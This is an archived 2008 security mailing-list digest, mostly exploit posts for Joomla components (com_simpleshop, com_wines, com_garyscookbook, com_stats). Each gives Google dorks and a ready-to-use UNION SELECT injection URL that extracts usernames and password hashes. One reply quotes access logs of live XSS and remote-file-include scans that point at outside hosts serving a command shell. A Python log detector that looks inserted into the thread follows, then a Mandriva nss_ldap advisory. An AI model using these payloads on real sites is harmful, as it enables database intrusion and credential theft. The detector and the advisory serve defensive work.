http://forum.aria-security.net/showthread.php?p=1461)


AurA,

Aria-Security Team

(Credits to Aria-Security Team)



joomla com_simpleshop SQL Injection(section) #

2008-02-25 Thread hackturkiye . hackturkiye
###

# 

#   joomla com_simpleshop SQL Injection(section)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl:"com_simpleshop"

# 

#  DORK 2 : allinurl: "com_simpleshop"section

#



   EXPLOIT : 


index.php?option=com_simpleshop&[EMAIL PROTECTED]&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





Re: Re: SQL-injection, XSS in OSSIM (Open Source Security Information Management)

2008-02-25 Thread dcid
Hi list,


I am seeing scans for this in the "wild" now... As Dominique said, I don't know 
who would open up their SIM to the world, but better apply the patch soon.


222.239.78.91 - - [22/Feb/2008:17:24:48 -0300] "GET /wiki//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 200 6792 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"


195.189.85.162 - - [23/Feb/2008:12:04:55 -0300] "GET /wiki/index.php//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 200 6605 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"


61.19.38.155 - - [23/Feb/2008:14:07:28 -0300] "GET //ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://h1.ripway.com/durhaka/cmdasca.txt? HTTP/1.1" 200 6891 "-" "libwww-perl/5.803"



Thanks,


--

Daniel B. Cid

dcid ( at ) ossec.net

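The access-log entries Daniel quotes above are the kind of thing a defender wants to pick out of a web log automatically: a percent-encoded script tag in `dest=` and an `absolute_path=` pointing at a remote URL, and, for the other posts in this digest, a `union ... select` spaced out with `/**/` comments. The following is an added example, not part of Daniel's post or of OSSIM, that parses Apache-style log lines and tags each request with the indicator classes it matches. The log lines inside it are constructed with placeholder addresses and hosts (203.0.113.x, 198.51.100.x, example.invalid), not the ones from the thread.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log (not copied from the post): same Apache access-log
# shape as the entries above, with documentation-range IPs and a placeholder host.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Feb/2008:17:24:48 -0300] "GET /wiki//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://example.invalid/i? HTTP/1.1" 200 6792 "-" "libwww-perl/5.803"
203.0.113.8 - - [23/Feb/2008:12:04:55 -0300] "GET /index.php?option=com_stats&opt=viewteam&id=-1/**/union/**/select/**/1,2/**/from/**/jos_users/* HTTP/1.1" 200 6605 "-" "Mozilla/5.0"
198.51.100.2 - - [23/Feb/2008:14:07:28 -0300] "GET /ossim/session/login.php?dest=/ossim/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache "combined"-style line: ip ident user [ts] "METHOD target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicator patterns, applied to the decoded and comment-stripped request target.
SQLI_RE = re.compile(r'\bunion\b\s*(?:all\s*)?\bselect\b', re.IGNORECASE)
XSS_RE = re.compile(r'<\s*script\b|javascript:', re.IGNORECASE)
# A *_path parameter carrying an absolute http(s) URL: remote-include style input.
RFI_RE = re.compile(r'\b[a-z_]*path=https?://', re.IGNORECASE)


def normalize(target):
    """Percent-decode the request target (so %3Cscript%3E becomes <script>)
    and replace closed inline SQL comments, which the payloads on this list
    use in place of spaces, with a single space."""
    decoded = unquote_plus(target)
    return re.sub(r'/\*.*?\*/', ' ', decoded)


def classify(line):
    """Parse one log line; return a record with the matched indicator tags,
    or None if the line is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    q = normalize(m.group('target'))
    tags = []
    if SQLI_RE.search(q):
        tags.append('sqli-union')
    if XSS_RE.search(q):
        tags.append('xss-script')
    if RFI_RE.search(q):
        tags.append('rfi-remote-path')
    return {
        'ip': m.group('ip'),
        'ts': m.group('ts'),
        'status': int(m.group('status')),
        'ua': m.group('ua'),
        'tags': tags,
    }


def scan(log_text):
    """Return the records of every well-formed line that matched at least one
    indicator, in log order; malformed lines are skipped."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = classify(line)
        if rec is not None and rec['tags']:
            findings.append(rec)
    return findings


if __name__ == '__main__':
    for rec in scan(SAMPLE_LOG):
        print(rec['ts'], rec['ip'], rec['status'], ','.join(rec['tags']), rec['ua'])
```

Run over the constructed log, the first line is tagged both `xss-script` and `rfi-remote-path`, the second `sqli-union`, and the plain login redirect is not reported. Decoding before matching matters: the script tag in Daniel's entries never appears literally in the raw line, and a comment-spaced `union/**/select` is only one of several spacings an attacker can use, so the normalization step is where this kind of check earns its keep. The 200 status on such a request, as in the quoted entries, is the cue to look at what the page actually returned.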

joomla com_wines SQL Injection(id)

2008-02-25 Thread hackturkiye . hackturkiye
###

# 

#   joomla com_wines  SQL Injection(id)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl:"com_wines"

# 

#  DORK 2 : allinurl: com_wines "detail"

#



   EXPLOIT : 


index.php?option=com_wines&[EMAIL PROTECTED]&func=detail&id=-000/**/union+select/**/0,0,password,null,null,null,null,null,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*





# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





joomla com_garyscookbook SQL Injection(id)

2008-02-25 Thread hackturkiye . hackturkiye
###

# 

#   joomla com_garyscookbook  SQL Injection(id)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl:"com_garyscookbook"

# 

#  DORK 2 : allinurl: com_garyscookbook "detail"

#



   EXPLOIT : 


index.php?option=com_garyscookbook&[EMAIL PROTECTED]&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*





# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





Joomla com_stat "id" Remote SQL Injection

2008-02-25 Thread no-reply
Aria-Security Team (Persian Security Network)

http://Aria-Security.Net

---

Shoutz : The-0utl4w, Sc0rp!on, mormoroth, Kinglet, iM4N, 

Joomla com_stat "id" Remote SQL Injection


index.php?option=com_stats&opt=viewteam&id=-10010111/**/union/**/select/**/username,password,3,4,5,6,7,8/**/from/**/jos_users/*


(Original Advisory@ http://forum.aria-security.net/showthread.php?p=1465)


AurA

Aria-Security Team

(Credits to Aria-Security Team)



[ MDVSA-2008:049 ] - Updated nss_ldap package fixes race condition allowing user data theft

2008-02-25 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:049
 http://www.mandriva.com/security/
 ___
 
 Package : nss_ldap
 Date: February 25, 2008
 Affected: 2007.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A race condition in nss_ldap, when used in applications that use
 pthread and fork after a call to nss_ldap, does not properly handle the
 LDAP connection, which might cause nss_ldap to return the wrong user
 data to the wrong process, giving one user access to data belonging
 to another user, in some cases.
 
 The updated package has been patched to prevent this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5794
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 734883fd4974f083ac6005a56438754b  
2007.0/i586/nss_ldap-250-1.1mdv2007.0.i586.rpm 
 5f11443bb851c8c650c2aa1fa89743bd  
2007.0/SRPMS/nss_ldap-250-1.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 cdcf474742cdbeeb2d8c479a17270195  
2007.0/x86_64/nss_ldap-250-1.1mdv2007.0.x86_64.rpm 
 5f11443bb851c8c650c2aa1fa89743bd  
2007.0/SRPMS/nss_ldap-250-1.1mdv2007.0.src.rpm

 Corporate 4.0:
 f862188b3f2f11aa03f656dc29bee938  
corporate/4.0/i586/nss_ldap-239-3.2.20060mlcs4.i586.rpm 
 735c052491e2d3943be54bc93cc6fb29  
corporate/4.0/SRPMS/nss_ldap-239-3.2.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 01bc19f756541e2a34943255f75a7ca4  
corporate/4.0/x86_64/nss_ldap-239-3.2.20060mlcs4.x86_64.rpm 
 735c052491e2d3943be54bc93cc6fb29  
corporate/4.0/SRPMS/nss_ldap-239-3.2.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (GNU/Linux)

iD8DBQFHwn1vmqjQ0CJFipgRAhAEAJ9DWufRZ/a2TduRaXQjht/NgV5gnQCfVUZd
Ezp/2K3q5VsIlGN6wnLRNYs=
=U/Ma
-END PGP SIGNATURE-